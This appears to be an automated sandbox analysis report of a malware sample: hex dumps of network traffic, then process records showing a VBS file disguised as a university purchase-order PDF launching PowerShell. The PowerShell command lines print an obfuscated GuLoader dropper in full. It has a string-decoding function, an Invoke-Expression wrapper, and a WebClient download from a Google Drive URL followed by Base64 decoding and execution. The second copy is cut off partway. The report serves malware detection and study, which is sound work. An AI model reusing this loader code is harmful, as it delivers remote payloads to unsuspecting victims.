                                      2024-10-01 05:43:33 UTC4859INData Raw: 2e c6 f9 82 64 4b 89 92 b3 22 70 1c 63 f9 eb 58 92 f6 9a 95 6e ba fc 6a b7 1b c5 97 6e 28 4d 53 29 f4 31 8a 51 05 a9 ce e8 44 6b 21 0a c8 7b 71 67 62 eb 51 34 4e b8 8e cf e5 91 57 90 96 74 e6 f0 88 2e 24 a6 e3 ad c7 7c c2 25 e5 e7 5c 3d d9 10 e6 40 74 9f 16 7a 20 fd 96 85 00 6b 6a e6 f8 e7 be 40 10 90 84 bc 55 d0 c1 8f ef 47 c0 61 82 18 ae 3e 6a e1 9b 39 f9 a8 3f 07 26 dd 18 42 cc da d8 74 b2 4e 5c db 14 bf 7e 95 8e c2 99 14 d5 9d bb 33 bb e0 c4 f0 42 96 0b a9 bd 4e cd fc c6 91 db 44 02 0f 0d 38 75 4f 0f 7c 44 04 f4 33 1e 58 ef 6e e5 13 f1 68 76 38 00 40 df 28 2c d7 db d0 98 e6 47 68 85 17 49 10 63 ad 21 56 c0 9b 42 3f cd 1d 34 d2 77 18 2f d8 90 eb 29 03 d4 c5 6f 1e 9c 40 f7 fb df c6 2c cb 64 64 36 06 1a 25 1f 15 56 86 60 d0 32 74 0b ec b3 d7 ed a6 d4 87
                                      Data Ascii: .dK"pcXnjn(MS)1QDk!{qgbQ4NWt.$|%\=@tz kj@UGa>j9?&BtN\~3BND8uO|D3Xnhv8@(,GhIc!VB?4w/)o@,dd6%V`2t
                                      2024-10-01 05:43:33 UTC121INData Raw: f6 46 e2 e0 62 7f 1e a7 8c 80 1c 34 be e0 11 08 21 20 bd 8b 62 bf 57 b4 fe f1 59 3f da 2a 6f 1f 14 96 6a 0c 23 ec 43 18 33 a7 b7 cd 29 06 40 83 04 8d 37 df 8f dd dd 9c 08 7e f0 6e ed 59 d8 90 30 72 ea 29 7d 64 8a a4 17 1e 61 e6 4c 19 f2 96 3b 5b 3a 35 71 8e fa 46 d2 95 2b 46 37 dc c2 2a 1d 04 13 c9 33 5c ec 42 a1 f5 20 c4 f4 be 51 a8 f0 7f d5 9e 54 b8 a9 54 87
                                      Data Ascii: Fb4! bWY?*oj#C3)@7~nY0r)}daL;[:5qF+F7*3\B QTT
                                      2024-10-01 05:43:33 UTC1323INData Raw: a3 08 fa cc 9f c9 15 bf 75 b9 c3 ca a0 f4 e1 20 cb 00 dc 33 a5 70 e6 56 74 e4 23 fa bd ca e9 0d 11 d4 3e d0 63 63 d6 c2 96 7f 48 32 01 d0 3b 8f e3 ba d2 e3 de 25 cc 41 7c 2d 87 61 e9 52 7d 1a 45 85 78 50 72 10 0f c3 38 fc 28 fc 69 4a bd e6 ef 6f f2 1b 64 bf db 2e 1c 26 fd ad 1d 62 f3 5b fd 3d c0 08 b3 68 d2 c1 ea 20 10 74 48 a0 86 78 8d 2f 7e fe 78 c8 a7 8a 9a 48 15 bb 48 64 b4 9e 3d 50 f5 05 c0 81 c8 4c 5d ad cc ad 34 f2 36 45 1f 68 8b c0 50 df c6 3d e7 25 c6 97 ef 69 86 24 94 b2 be 42 4a 9c 19 02 96 86 6c ae aa e0 60 46 94 81 36 bc a6 b6 0a c1 0b 87 b0 21 33 be d1 61 b3 08 f0 2f 54 a5 42 d1 22 8e ab ec 08 9c ab e8 77 9f 41 01 50 c6 54 cb 06 7e ad 6f 01 fd d0 b5 9a 47 65 f8 a5 e5 93 29 8f 9b 88 9b 97 f5 7a 92 a5 e1 d1 48 36 97 5d e7 ae 43 54 3c 4d 41 7f
                                      Data Ascii: u 3pVt#>ccH2;%A|-aR}ExPr8(iJod.&b[=h tHx/~xHHd=PL]46EhP=%i$BJl`F6!3a/TB"wAPT~oGe)zH6]CT<MA
                                      2024-10-01 05:43:33 UTC1390INData Raw: 4b 0e ef bd 33 d2 dd 2f 38 3f 83 8a 47 e9 c6 1a f9 b5 fa 4f 32 66 44 cc 4d 2a d2 30 e4 55 09 79 fa 9e 44 5c c2 a8 03 2b 00 ec 2b 9e 46 78 9a 80 27 16 2a fc da 4f 98 cb 23 bb 84 0b 4e b2 98 ef d6 03 3b fa 75 aa a7 19 93 68 8c 3f ea 00 cf af ee 35 e9 85 b4 97 0e 28 5e ae 6a 42 1f da 44 7d 63 1f 8b ed 10 7d aa 36 e4 14 df 5b af d9 17 7f 9c df d4 1f 7c 9b af 2e c8 33 81 60 4d 0d 10 6c 8d 41 af 41 2f 2e 36 cb da e5 f1 4f b0 36 f0 6b df 86 60 ff 26 de 9e 64 67 53 09 d9 17 4d d0 24 da ac 82 4d fe 46 72 61 9e 0e c2 11 21 54 b4 d7 bf 14 db 33 94 1e 22 84 8b 46 7d 05 18 39 40 92 b9 c9 14 2c 47 e3 82 ae c9 b9 25 ef df d1 e3 5e c5 88 85 c6 d3 97 80 7e 20 21 1d 18 b8 b9 28 e3 2a cb e7 7d 44 cb e5 e8 ff ea 23 f0 06 32 38 ac 0e 37 22 d6 34 ca 11 c5 e6 8c 9f 65 08 35 d5
                                      Data Ascii: K3/8?GO2fDM*0UyD\++Fx'*O#N;uh?5(^jBD}c}6[|.3`MlAA/.6O6k`&dgSM$MFra!T3"F}9@,G%^~ !(*}D#287"4e5
                                      2024-10-01 05:43:33 UTC1390INData Raw: d4 9b 77 be 42 6a d1 cc 81 bf b3 21 1f 58 f4 3c 2c 74 3f d2 de 5f 97 27 45 c1 b7 6c be e3 de aa d1 a5 2c b8 20 c0 d2 dd d7 8f 75 42 b6 b2 51 80 69 e8 2a 6a 55 79 2e b3 53 36 b1 60 dc 60 81 10 d7 0b ce d3 2b 8f d0 6b 46 c6 b0 9a 2e 64 e1 a8 1b e6 ba 10 5e a7 a6 c1 44 2b fa 0c 73 e0 ce 91 f3 44 17 41 81 97 b0 bc b9 4b 00 69 7f 5c 21 c1 10 e6 92 b3 fe c2 71 2a fd bd 55 9f 26 e0 e2 f9 f8 fa 41 d4 b7 5a 6b 9d 77 ca 8d c0 5c 1a 8a 7d 41 2d c6 7e 9e 11 ed cd c8 3a 3b 63 53 46 81 ff 99 78 b5 e8 4b 1b 87 fd 4f 08 3e 55 b7 99 7e 40 75 eb 31 38 22 69 f4 96 3f 03 12 03 a4 cf ac 12 ee 24 12 7d da fa 8d f1 b9 74 90 ce 40 d0 fc 50 14 a3 62 3f 06 d5 b4 e8 ae ce 10 28 fb 9d 73 ab d9 68 e9 68 e3 c1 33 32 16 5b cc 43 4a fa 3d 55 e9 12 21 52 dc 18 ab d1 e5 e4 72 be 05 06 a5
                                      Data Ascii: wBj!X<,t?_'El, uBQi*jUy.S6``+kF.d^D+sDAKi\!q*U&AZkw\}A-~:;cSFxKO>U~@u18"i?$}t@Pb?(shh32[CJ=U!Rr
                                      2024-10-01 05:43:33 UTC1390INData Raw: 59 4e c6 5b 14 5f bc 82 ce 8c 43 d2 fb 26 22 d4 3f 46 51 01 e4 2b fa c7 f0 b3 6f ad e2 c3 0c 51 e1 cd 33 e6 e9 f1 60 79 4b 4e dd 31 1b 53 2d 4e 73 d8 65 a7 d0 1e 09 68 2c 24 f4 cf 0f 76 d1 08 46 02 c5 d7 ff c2 70 0c 7d 05 ed 7c 6c 15 56 e2 93 c8 b5 37 bd cd 08 a6 1d 2a c9 77 a7 6d f9 83 0e 00 3f 3c a1 2e 72 0a 5d ae 80 bb 3f 53 4b 25 94 4e 66 0a 87 80 9b c5 67 02 76 2a 50 d3 2b 87 be 87 e9 58 cd ee 04 b8 b6 57 9d f2 29 0e 20 67 d2 10 fd 58 60 ef 0b b5 8c 41 33 38 35 54 e1 27 e8 cf 65 9c 27 5f b3 9e 5f 3c 49 38 0e df 3c 21 5f b4 5f 4c 84 4b 3b bc bb d9 bd b9 4d ad a6 e0 3f 24 11 08 d6 bb b6 b0 8d da c4 7a 56 33 02 0e d7 cd d8 c5 ab 6e 71 56 93 03 45 7e a2 66 75 04 79 24 7c a5 0b 19 33 1f 99 09 b7 b2 30 03 ec b0 b0 14 89 c9 66 85 99 9c 1c 9b 92 d1 a0 3d 50
                                      Data Ascii: YN[_C&"?FQ+oQ3`yKN1S-Nseh,$vFp}|lV7*wm?<.r]?SK%Nfgv*P+XW) gX`A385T'e'__<I8<!__LK;M?$zV3nqVE~fuy$|30f=P
                                      2024-10-01 05:43:33 UTC1390INData Raw: ea b6 23 9e f9 70 72 90 4e 0f 36 1f 44 49 ac d5 38 76 91 e6 bb 51 1c 93 29 6d e7 da 35 c0 12 22 1d f1 ff 14 93 2d 1a a6 ab d0 e6 33 3c d5 61 c4 ec f6 ab c8 52 f2 28 59 cf b4 78 61 72 7b 7c a5 68 4d 88 b5 f8 70 a1 f3 fd 39 15 19 47 8a e3 3f 96 19 f8 41 8d 30 b9 c7 59 84 6a b3 9a 3f ad 4b 79 f7 ea f3 ce 2a 2a 51 cb 85 35 db 6d 2e 21 ce 65 b2 ec f6 96 46 5d cf c3 0a e4 39 12 aa bc 16 52 e5 0b 02 00 38 0d 51 6a a8 7c 75 2c 60 8a 6b 3c f5 cf cb 7e d1 b6 8c a7 4c 09 d3 bd b4 a3 c8 5d 93 f8 5f af 88 fd 0b 12 bf f3 2d bf 25 4b 4d 26 ed d7 5e a4 73 07 44 b7 92 e5 4a 5d 3b 05 98 c4 46 e1 aa a8 64 82 34 fc 82 70 f8 8b bc 4e 7f e2 44 fc c8 1c 5c 30 a6 04 4c c7 d7 a2 ee 54 e5 4f 38 1c 0a 62 3b e1 ff 10 b5 60 e4 78 77 8f 1a 64 18 a6 bb c7 0f 22 a5 30 c5 a6 6c ff 10 14
                                      Data Ascii: #prN6DI8vQ)m5"-3<aR(Yxar{|hMp9G?A0Yj?Ky**Q5m.!eF]9R8Qj|u,`k<~L]_-%KM&^sDJ];Fd4pND\0LTO8b;`xwd"0l
                                      2024-10-01 05:43:33 UTC1390INData Raw: 6f 38 a5 94 83 ff f7 8b 1f 9c 6a b0 60 97 76 92 4a 45 45 3d 69 23 d7 ef 57 9b 23 c1 55 b9 35 50 33 48 6a 0e 39 39 d9 53 56 55 31 44 f0 cb 20 fe a2 75 eb 28 04 ff 4e 17 fe 50 cc de b8 c1 1f 2f d2 cd 53 51 3c 68 79 27 8a 45 64 7b d5 79 ad 67 bb aa b0 7c 20 cb d0 12 2c 8c cb 32 99 a8 24 4e bf 92 c8 b3 b6 0a d2 e2 f1 57 35 be 68 96 8e 06 d7 0f 16 ae d1 98 96 5f 71 35 74 f0 86 4e 55 98 13 bf 22 fb 8f 4b 98 9f d4 93 ca 7e ee 71 cb ec 48 9d be 38 03 64 b9 9a b8 69 7e 02 b4 90 e8 43 df ca 93 9b 18 47 ba 50 72 78 f9 d7 10 ae 16 b4 74 1f e5 d5 b1 c9 5c b7 61 b6 f0 07 9a d4 24 e4 3e d6 39 a0 d6 66 39 cf 1c 77 cd 37 3a 01 69 26 e8 00 8a 65 4a 98 61 72 7b 7c 60 05 de 9c 3e 49 32 18 54 13 b8 f9 df 11 b9 15 75 96 bd fb 41 8d 4c d3 c5 5b d2 3c 24 dc 3d 0a fe 2f e8 e9 01
                                      Data Ascii: o8j`vJEE=i#W#U5P3Hj99SVU1D u(NP/SQ<hy'Ed{yg| ,2$NW5h_q5tNU"K~qH8di~CGPrxt\a$>9f9w7:i&eJar{|`>I2TuAL[<$=/
                                      2024-10-01 05:43:33 UTC1390INData Raw: 71 ef 09 25 be 26 77 55 9c d2 b2 51 ad 2a 1c cf 02 fa 13 ba 9d 05 5e 01 f7 25 39 ac b6 b5 fe 23 6b 93 43 33 e6 91 c3 dc d9 ef 84 5b 93 bb ff 76 50 fd e9 b9 5c 27 98 c4 e8 35 68 a1 05 04 a0 0a b2 95 38 ca 50 9c 34 9d 26 0b 00 60 3a e1 20 28 e5 3c 4a d5 ed cb 41 8d 42 26 00 2c 65 e0 10 71 41 45 e3 ee 4f a0 2a 48 50 7e 12 e6 eb e7 14 27 7b 58 ff 18 91 c6 34 1c 4e 02 fa c0 e6 84 aa 29 e8 13 e1 98 c7 91 da 16 ad 4d 0a 8f 6f 2e 87 0c 24 8d b2 2d b1 95 3d 81 31 b9 b2 0a 34 f6 4e 26 c0 78 8b 95 31 d0 39 2c 3f 50 63 94 ce 00 c5 00 e4 3c 66 02 11 28 49 4a b0 e6 63 97 ec c6 a6 4d f7 b2 c5 e0 2f 31 b5 20 41 1e cb b0 86 ca 33 04 44 e7 9a 0d 2c 32 0e b4 13 03 ab 63 5a ae db 79 ec ac 33 3b 4a 09 1c 24 86 52 6f 22 4e 72 b0 89 a6 1f e3 39 8c 41 d9 39 83 07 71 8a c5 13 be
                                      Data Ascii: q%&wUQ*^%9#kC3[vP\'5h8P4&`: (<JAB&,eqAEO*HP~'{X4N)Mo.$-=14N&x19,?Pc<f(IJcM/1 A3D,2cZy3;J$Ro"Nr9A9q


                                      Click to jump to process

                                      Click to jump to process

                                      Click to dive into process behavior distribution

                                      Click to jump to process

                                      Target ID:0
                                      Start time:01:42:50
                                      Start date:01/10/2024
                                      Path:C:\Windows\System32\wscript.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SOLICITUD DE PEDIDO (Universidade de S#U00e3o Paulo (USP))09-30-2024#U00b7pdf.vbs"
                                      Imagebase:0x7ff75dce0000
                                      File size:170'496 bytes
                                      MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:2
                                      Start time:01:42:53
                                      Start date:01/10/2024
                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Daddy Sabe Kreprven Hensttelsernes Brnesengenes Ribwort #>;$Tiberius='Forvokset';<#Tangloppers Vindroses Klassesamarbejde Atommissilernes Mngderabattens #>;$Bumblebeefishes=$host.PrivateData;If ($Bumblebeefishes) {$Driftssikrere++;}function Stratocumulus($Udtagelsens){$Variantens=$Bibliopegistical+$Udtagelsens.Length-$Driftssikrere;for( $Presningers=5;$Presningers -lt $Variantens;$Presningers+=6){$Deanne+=$Udtagelsens[$Presningers];}$Deanne;}function Romancerne($Amphiblestritis){ & ($Perijove) ($Amphiblestritis);}$Termometeret=Stratocumulus ' ,iveM GroloB uffz,ndadiMonotlb,ombl,akanaoverd/Incom5Klump.Ojibw0 Dest myelo(BrevsWAndreiGon pnTogosdSkraaoBkkenw nblisQuant .ldtaNCommeTBly n Skyde1Chefa0Bu fo. Adri0 Sand;Inrad ForeWChapliFodern Back6U.enf4 Clum; Atli DetacxEfte.6Won s4vippe;T chn El oqrProg vCopub:Fusio1,egra2U eff1 isje.Ussel0synge) ssev Out lGExpedeTrinsc annk.nrepo Prei/Inten2str.t0 asth1butti0 ,nds0Topta1themi0 Blaa1 togs Buks FLeneni Daasr ReexeUvatefGgekaoQrparxPert / Tred1Kurs.2 Bifi1 Anxi.Fleck0G obo ';$Redaktionernes=Stratocumulus 'B lfauSelv SSubmieAnkleR Mis,-skrifASnes,gDisgaeUdviknSte,etUdst, ';$Coadjuvant=Stratocumulus ' Uncoh Studt aroktVagttpStares H po:S bcl/ Rang/InevidBuglorUnconiO twavBemuze.rlle.AsbesgBrighoDepreoRdsptgprocrlSal meKej e.ArrtecVandioLabormSyre / PrinuOpistcBarse? DyspeCasquxBr tipEks mo lter FormtDe ik= PlacdSy,cooRaneewTilganDu,sllPlaneoEnr qaId oldCrean&UnthoiMa sedForst= Hono1 Ferr1UnbarzChondM UndezBoxcaz Weinw sinnHOrdkl9UngarHLecanUTekstCVermuNPropeKTabul5En ed3CrapaAUdslagPrepaFErasjrGtepabForbrFStemm7Py opXNonpai Are F St.inAnticf Barbq Fre.8TuberbS ubh_ to suBikin ';$Tarnal=Stratocumulus 'Abbre> Mayw ';$Perijove=Stratocumulus 'ele.tiPostoeV,jlex ddor ';$hovedmandens='Galenes';$Sabuja='\Tavell.Vrd';Romancerne (Stratocumulus 'Un er$WeekegAfspal ForeoColtsbDowsaaZon il Bla : myskLPrceduGlycek hjlpsTekstuGdni sProskvSophrrbartoeFraxilPolytsInkw,e UnrerTrucknIncive Folk= E gr$Amanie Puren BundvSupe :Tr kna SodapFictipTeachd rseaGenertMngdea Pri +Stoer$InvasSb rgeaStt.ebTieleuPterojServia ,rol ');Romancerne (Stratocumulus 'Therm$SharegcatallGrundoAmatrbdoed.a PerilSkr,a:ReignKaureanH nnra Urinl aandd ernieStrubnYogeed UdsmeFatte=R tin$SurmeC KommoDit aaLe igdAfv kj Encau SidsvSkovfaTelt,n,pkalt Hopk.Omdiss ,laepFlle lTusseiAnge.tGen e(Tide,$KopisT Can aVarslrImpasnForgaa.ystelFormu)Vurde ');Romancerne (Stratocumulus 'Amfib[loca NAndeneHokest endi. orgeS egnie Firer uadvMasseiRaviscRrlggeWagglP oninooctadi Sne nKaut tSubteM PostaPushen GascaF ikkginvole ChrorAflnn]Hrels:C bal:TilstSRegreeRagascBraveuNglefrSubeli FeattHypobySheucPLystfrOverfoNonhatKamgaoCarpecShuddostruklHirud Fl.ed=Sunga Wint[Bedk,NRhamneSkridtAsc r.zoarcSTaareeTra scSceneuKalatrW.stoielvbrtForeryOveriPAmb,vrEtymoo.yanitSodleo B ofcUnifaoCy thlKonfeT DngeyDambrpPr toeTingl]Dyb r:Pr pe: Fo.fT GstflVoldts ,all1Plad 2 sovs ');$Coadjuvant=$Knaldende[0];$Manius=(Stratocumulus 'Teena$ ind gIn ralIrrelOp.escB He mA EtioLJuece:R sikr Op aeTilluvVejskiCreagS BodeoColporIchthS Forl=UrtesnThefteChr mw Impu-S.ussoSlattbchookjUnderEHeretCSpidst all AgorsNon,rySpiseSRetirtCatchEAgnelmFilm,.AselanDutteeFo sttA tik. vampWSuperE BaghB KondCC nniLtele I TrkneI dkbnH perT Pelu ');Romancerne ($Manius);Romancerne (Stratocumulus ' angb$DimenR PrioeSigvav OptaiOpiops CitrobundprMachisUnfra.TekstH FlareRadiaaBrod.dV.rtueSeptorRotansMonst[Torso$FortaRSubtreDiscadAntiaaEncork UgektgrammiAdmonoAntednInte eNskesr SkarnPauseeudjaesEnam.]Ronni=omkla$ Me lTColore ivinrTor,hmFormioReak.mPro oeToba tNataleEtmaarGunl,e AmphtLap o ');$Controvert=Stratocumulus ' Nont$UnfriRMilite InstvRe,triO erssdext oDataerChangsReent.AnkylDTils oBrikewSilvan verhlFemteoBiparaSibildArb,jF U dei BflelWakekezooma(odont$StrknCVilfroBranda SkoldPreofjSpex u ikrv edlgan nignBissatl,sti,Frigi$DeviaaV.rboc.iltmo uperl Staao Dds gDull,yUtilb)Contr ';$acology=$Luksusvrelserne;Romancerne (Stratocumulus ' Aiga$StenvG PerclBesmioHder,BOp inA,nowcLSed m: FortpSme,trTeetiElungys T maCSkol,o,osprUIldsltCo fl=Vind (FernytPanorESkabmsC.elatAfdra-Lion pCorecaShtgoTNsk.rH Fe r este$Dro ea Anthc EgenO Pr,dlDestrOCove g HjneYTillb)C art ');while (!$prescout) {Romancerne (Stratocumulus 'Exsec$GobligJordtlSpec oPrincbCons aNyttelFrdse:Unkn kHyperoReg rm Di tpDolmaoTzolkn isbeeUnd rrLychee upersSwobb=wissi$LimintTill r OutsuAktioedivis ') ;Romancerne $Controvert;Romancerne (Stratocumulus 'pikemSReacttUr oma HandrBav etK,age- .tenSCachilCurbseSem.peuppilpFinge nexa4 Bota ');Romancerne (Stratocumulus 'Svars$Sud eg cephlG.aato HanebSa,meaSc.tul Frem:TraumpTablorHa mleFragmsDraw cHelseoUnferuRedcotMidda=Givab(,amplTN,nemeScytosKlaustImmor- P roP BuffaKommutUnpr,hUnsol Skum$QuickaNotomcP denoSynnvlst,ejohovedgDistoyArkip)Hand ') ;Romancerne (Stratocumulus 'Bugal$UudtmgBattllHindeo Ardub Ti laBoxinlTa kl:GrundRFyrr y S jutGritttSte,deE near Kvins UtchkSlaaeeInte sMidga= skad$Bort g By.tlSnur o Svagb.adroa jugulEx er:AandsFFloateAst,olOtocrtmanwiaGebrdrGruttbKomple H stjLapard phoveUncrar Magnn iffeeHel rs Meds+Falds+Tvege%Fejlr$havf KSchilnNarcoa nhealG vnldUnd reTond nShee,dRombeeKlokk. FramcT,lbao GraduR tatnAltastT ebo ') ;$Coadjuvant=$Knaldende[$Rytterskes];}$Woodlike=315055;$Bullwhack=31145;Romancerne (Stratocumulus ' Arre$CivilgQu lmlNonaroDrvblbArgota NicklDiato: CuddAResu aorbicbAc.ydnBlom i avyan redegUdf rsSyersdSl.vaaSkrupgVan,d Blind=Start JudypGKropsePerchtSyste-AmatoCLserfodriftnVo attDokkeeFo esnUafhnt Der A ilp$k nciaM talc MilioStraalKlageoHv.ragR,matyOvalt ');Romancerne (Stratocumulus 'Gemm $Magtsg ZigslE ecto BinobBlankaOver.l Admi:Sw,atRAfdriaDiscobGuardbSupe a urbunDek t Decen=Skovp nonco[XanthSTaiveyIndh sMag htMaskieM rphmScle . WaltCLystbo precnfrekvvGn ereSkolerUn.nstSagos].atte: Lo r: ForuF RetorSymbio DiscmintenBTho aaIncitsAfskyeHj.le6 Fris4Apo oSVi kstOve arManiciT stynElg,agIdent(Glaym$ProblA KaldaWars.b gglonCam,yiG,mminTilkogMaks sProtodN onfafo,hagOpsam)Dag e ');Romancerne (Stratocumulus ' airl$indkbgdiskulForfaounad b VskeaP.irelBon e:TidstVRefuta,lamenSkr.edbesvir RenseEnebonGymnadictereAdlum Recru=Musik Mucig[PruhbSDomsmyD censudelitWes ee HypsmSprog.KanceTIn bre Bengxna retRocke.InspiEMas,onFeedhcKly.koCarl,d S ori.nducn Hydrg B,mb]apach: peci:BardoA altrSNo seCUnencI,nfreIMungu. StruGLotife ,dedtElastSC eput Pro.rBesl iCen rnBlkhag arkk(Teist$ KimeR St aa enaebPattebUdgyda ArabnC.amo)ducki ');Romancerne (Stratocumulus 'Irkes$gldelgPla,dlDi,keolipizb Pha,aMidcalHypop:Pu poBFlyveoSoo lnEncykdTytteaosh obToteslF.rsyeTooth=Pr,gr$pls.bVBeda aB lignSu,dod CacorAsiateNightnMelandFlu reTi,ae.Sve,ssDevilu.innabBaadvsS ndit Strmr,elefiSkuepn GodkgElint(Upwro$C aisW DisaoE,plaosuperd planl BasiiParrok ommesub o, fami$EkvilBPast u FletlUnreslKultuwD.mmeh AftoaFu,iocSkadekDiddy)Tugte ');Romancerne $Bondable;"
                                      Imagebase:0x7ff7be880000
                                      File size:452'608 bytes
                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000002.00000002.2273173018.00000297E5ADD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:high
                                      Has exited:true

                                      Target ID:3
                                      Start time:01:42:53
                                      Start date:01/10/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:5
                                      Start time:01:43:07
                                      Start date:01/10/2024
                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Daddy Sabe Kreprven Hensttelsernes Brnesengenes Ribwort #>;$Tiberius='Forvokset';<#Tangloppers Vindroses Klassesamarbejde Atommissilernes Mngderabattens #>;$Bumblebeefishes=$host.PrivateData;If ($Bumblebeefishes) {$Driftssikrere++;}function Stratocumulus($Udtagelsens){$Variantens=$Bibliopegistical+$Udtagelsens.Length-$Driftssikrere;for( $Presningers=5;$Presningers -lt $Variantens;$Presningers+=6){$Deanne+=$Udtagelsens[$Presningers];}$Deanne;}function Romancerne($Amphiblestritis){ & ($Perijove) ($Amphiblestritis);}$Termometeret=Stratocumulus ' ,iveM GroloB uffz,ndadiMonotlb,ombl,akanaoverd/Incom5Klump.Ojibw0 Dest myelo(BrevsWAndreiGon pnTogosdSkraaoBkkenw nblisQuant .ldtaNCommeTBly n Skyde1Chefa0Bu fo. Adri0 Sand;Inrad ForeWChapliFodern Back6U.enf4 Clum; Atli DetacxEfte.6Won s4vippe;T chn El oqrProg vCopub:Fusio1,egra2U eff1 isje.Ussel0synge) ssev Out lGExpedeTrinsc annk.nrepo Prei/Inten2str.t0 asth1butti0 ,nds0Topta1themi0 Blaa1 togs Buks FLeneni Daasr ReexeUvatefGgekaoQrparxPert / Tred1Kurs.2 Bifi1 Anxi.Fleck0G obo ';$Redaktionernes=Stratocumulus 'B lfauSelv SSubmieAnkleR Mis,-skrifASnes,gDisgaeUdviknSte,etUdst, ';$Coadjuvant=Stratocumulus ' Uncoh Studt aroktVagttpStares H po:S bcl/ Rang/InevidBuglorUnconiO twavBemuze.rlle.AsbesgBrighoDepreoRdsptgprocrlSal meKej e.ArrtecVandioLabormSyre / PrinuOpistcBarse? DyspeCasquxBr tipEks mo lter FormtDe ik= PlacdSy,cooRaneewTilganDu,sllPlaneoEnr qaId oldCrean&UnthoiMa sedForst= Hono1 Ferr1UnbarzChondM UndezBoxcaz Weinw sinnHOrdkl9UngarHLecanUTekstCVermuNPropeKTabul5En ed3CrapaAUdslagPrepaFErasjrGtepabForbrFStemm7Py opXNonpai Are F St.inAnticf Barbq Fre.8TuberbS ubh_ to suBikin ';$Tarnal=Stratocumulus 'Abbre> Mayw ';$Perijove=Stratocumulus 'ele.tiPostoeV,jlex ddor ';$hovedmandens='Galenes';$Sabuja='\Tavell.Vrd';Romancerne (Stratocumulus 'Un er$WeekegAfspal ForeoColtsbDowsaaZon il Bla : myskLPrceduGlycek hjlpsTekstuGdni sProskvSophrrbartoeFraxilPolytsInkw,e UnrerTrucknIncive Folk= E gr$Amanie Puren BundvSupe :Tr kna SodapFictipTeachd rseaGenertMngdea Pri +Stoer$InvasSb rgeaStt.ebTieleuPterojServia ,rol ');Romancerne (Stratocumulus 'Therm$SharegcatallGrundoAmatrbdoed.a PerilSkr,a:ReignKaureanH nnra Urinl aandd ernieStrubnYogeed UdsmeFatte=R tin$SurmeC KommoDit aaLe igdAfv kj Encau SidsvSkovfaTelt,n,pkalt Hopk.Omdiss ,laepFlle lTusseiAnge.tGen e(Tide,$KopisT Can aVarslrImpasnForgaa.ystelFormu)Vurde ');Romancerne (Stratocumulus 'Amfib[loca NAndeneHokest endi. orgeS egnie Firer uadvMasseiRaviscRrlggeWagglP oninooctadi Sne nKaut tSubteM PostaPushen GascaF ikkginvole ChrorAflnn]Hrels:C bal:TilstSRegreeRagascBraveuNglefrSubeli FeattHypobySheucPLystfrOverfoNonhatKamgaoCarpecShuddostruklHirud Fl.ed=Sunga Wint[Bedk,NRhamneSkridtAsc r.zoarcSTaareeTra scSceneuKalatrW.stoielvbrtForeryOveriPAmb,vrEtymoo.yanitSodleo B ofcUnifaoCy thlKonfeT DngeyDambrpPr toeTingl]Dyb r:Pr pe: Fo.fT GstflVoldts ,all1Plad 2 sovs ');$Coadjuvant=$Knaldende[0];$Manius=(Stratocumulus 'Teena$ ind gIn ralIrrelOp.escB He mA EtioLJuece:R sikr Op aeTilluvVejskiCreagS BodeoColporIchthS Forl=UrtesnThefteChr mw Impu-S.ussoSlattbchookjUnderEHeretCSpidst all AgorsNon,rySpiseSRetirtCatchEAgnelmFilm,.AselanDutteeFo sttA tik. vampWSuperE BaghB KondCC nniLtele I TrkneI dkbnH perT Pelu ');Romancerne ($Manius);Romancerne (Stratocumulus ' angb$DimenR PrioeSigvav OptaiOpiops CitrobundprMachisUnfra.TekstH FlareRadiaaBrod.dV.rtueSeptorRotansMonst[Torso$FortaRSubtreDiscadAntiaaEncork UgektgrammiAdmonoAntednInte eNskesr SkarnPauseeudjaesEnam.]Ronni=omkla$ Me lTColore ivinrTor,hmFormioReak.mPro oeToba tNataleEtmaarGunl,e AmphtLap o ');$Controvert=Stratocumulus ' Nont$UnfriRMilite InstvRe,triO erssdext oDataerChangsReent.AnkylDTils oBrikewSilvan verhlFemteoBiparaSibildArb,jF U dei BflelWakekezooma(odont$StrknCVilfroBranda SkoldPreofjSpex u ikrv edlgan nignBissatl,sti,Frigi$DeviaaV.rboc.iltmo uperl Staao Dds gDull,yUtilb)Contr ';$acology=$Luksusvrelserne;Romancerne (Stratocumulus ' Aiga$StenvG PerclBesmioHder,BOp inA,nowcLSed m: FortpSme,trTeetiElungys T maCSkol,o,osprUIldsltCo fl=Vind (FernytPanorESkabmsC.elatAfdra-Lion pCorecaShtgoTNsk.rH Fe r este$Dro ea Anthc EgenO Pr,dlDestrOCove g HjneYTillb)C art ');while (!$prescout) {Romancerne (Stratocumulus 'Exsec$GobligJordtlSpec oPrincbCons aNyttelFrdse:Unkn kHyperoReg rm Di tpDolmaoTzolkn isbeeUnd rrLychee upersSwobb=wissi$LimintTill r OutsuAktioedivis ') ;Romancerne $Controvert;Romancerne (Stratocumulus 'pikemSReacttUr oma HandrBav etK,age- .tenSCachilCurbseSem.peuppilpFinge nexa4 Bota ');Romancerne (Stratocumulus 'Svars$Sud eg cephlG.aato HanebSa,meaSc.tul Frem:TraumpTablorHa mleFragmsDraw cHelseoUnferuRedcotMidda=Givab(,amplTN,nemeScytosKlaustImmor- P roP BuffaKommutUnpr,hUnsol 